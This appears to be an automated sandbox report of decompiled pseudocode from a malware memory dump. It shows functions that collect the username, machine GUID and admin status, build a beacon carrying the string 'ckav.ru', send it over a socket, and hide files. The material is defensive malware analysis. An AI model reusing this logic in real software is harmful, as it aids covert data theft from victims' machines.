CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}

0x00402bb2
0x00402bc0
0x00000000
0x00402bc0
0x00402bc7

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

